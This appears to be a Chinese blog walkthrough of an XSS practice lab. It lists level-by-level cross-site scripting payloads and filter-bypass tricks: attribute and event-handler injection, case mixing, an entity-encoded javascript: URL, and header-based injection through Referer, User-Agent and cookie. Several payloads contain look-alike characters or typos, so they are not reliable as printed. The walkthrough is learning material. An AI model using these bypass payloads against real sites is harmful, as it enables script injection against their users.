当前位置: 首页 > news >正文

XSS靶场闯关小游戏

目录

1.​

2.

3.

4.

5.

6.

7.

8.

9.

10.

11.

12.​

13.

14.

15.

16.​

17.​

18.

19和20


1.

2.

"> <script>alert(1)</script> <"

">和前面的完成闭合

3.

'οnmοuseοver='alert(/xss/)'>

4.

输入<script'"Oon>

<'等都过滤了

输入"οnmοuseοver="alert(/xss/)"成功

5.

输入<script'>"OoNn

过滤了一些关键字,这里使用超链接

"><a href ="javascript:alert:alert(/xss/)">click</a>

6.

输入查看"οnmοuseοver="alert(/xss/)"

由此得知on会过滤但是oN没事

"oNmouseover="alert(/xss/)"

7.

过滤script和OoNn

使用"οnmοuseοver="alert(/xss/)"

得出"OoNnmouseover="alert(/xss/)"可行

8.

过滤了script"on等大小写

这里使用伪协议试一下javascript:alert(/xss/)

script还会被过滤,将s编码试一下java&#x73;cript:alert(/xss/)成功

9.

java&#x73;cript:alert(/xss/)

肯是xss不行换成http://baidu.com
java&#x73;cript:alert('http://baidu.com')

10.

通过尝试得出在?t_sort=<script'>"OoNn时会由反应

此时在页面上添加一个按钮click" type="button" οnclick="alert(/xss/)

11.

?keyword=<script'>"OoNn查看源代码

这里应该是将服务器请求放到了ref中

这里将ref的内容替换成" type="text" οnclick="alert('xss')

点击文本框就可以完成了

12.

查看源代码应该是将服务器请求存放到了ua里面

修改ua

13.

查看源代码服务器请求应该是存放在cook里面了,

这里试了下之前的方法" type="text" οnclick="alert('xss')不可以直接执行,此时我们看一些cookie

改为user=" οnclick="alert('xss')" type="text"

14.

没捣鼓明白

15.

查看源代码

使用 <span> 元素对文本中的一部分进行着色:
 

ng-include 指令用于包含外部的 HTML 文件。

包含的内容将作为指定元素的子节点。

ng-include 属性的值可以是一个表达式,返回一个文件名。

默认情况下,包含的文件需要包含在同一个域名下。

后面也一直不成功

16.

center() 方法返回一个指定的宽度 width 居中的字符串,fillchar 为填充的字符,默认为空格。

在多次尝试中发现会把空格,script,/等过滤掉最终使用%0a代替空格

?keyword= <input%0atype="text"%0aοnmοuseοver="alert(1)">

17.​​​​​​​

查看源代码

Embed 对象是 HTML5 中新增的。

Embed 对象代表一个 HTML <embed> 元素。

使用这个οnmοuseοver=alert(1)将其分别赋给a和b

?arg01=%20onmouseover&arg02=%20alert(1)

18.

和17题一样

19和20

有问题,也没做

http://www.dtcms.com/a/122752.html

相关文章:

  • 10A 大电流 DCDC 降流芯片 WD5030
  • 2025年AI开发学习路线
  • springboot集成大华人脸机
  • js实现跨域下载,展示下载进度以及自定义下载名称功能
  • Docker新型容器镜像构建技术,如何正确高效的编写Dockerfile
  • 前端三件套—CSS入门
  • 13_pandas可视化_seaborn
  • 青少年编程与数学 02-016 Python数据结构与算法 10课题、搜索
  • Webstorm 使用搜不到node_modules下的JS内容 TS项目按Ctrl无法跳转到函数实现
  • leetcode刷题日记——验证回文串
  • 算法比赛中常用的数学知识
  • C# Winform 入门(15)之制作二维码和拼接(QR)
  • miniconda安装R语言图文教程(详细步骤)
  • 13. git clone
  • Mysql | 主从复制的工作机制
  • 西电服务器环境配置问题汇总(一)
  • 【同步教程】基于Apache SeaTunnel从MySQL同步到MySQL——Demo方舟计划
  • 山东大学软件学院项目实训开发日志(7)之测试前后端本地部署
  • TCP连接四次挥手的过程,为什么是四次?
  • STM32单片机入门学习——第30节: [9-6] FlyMcu串口下载STLINK Utility
  • Rust入门之迭代器(Iterators)
  • 实战篇-梳理时钟树
  • QT学习笔记
  • 使用 DeepSeek API 实现新闻文章地理位置检测与地图可视化
  • 华为手机或平板与电脑实现文件共享
  • 电脑清洁常用工具
  • MySQL:锁
  • 秒杀业务的实现过程
  • Java 开发中主流安全框架的详细对比,涵盖 认证、授权、加密、安全策略 等核心功能,帮助开发者根据需求选择合适的方案
  • IP查询能够帮助企业进行数字化转型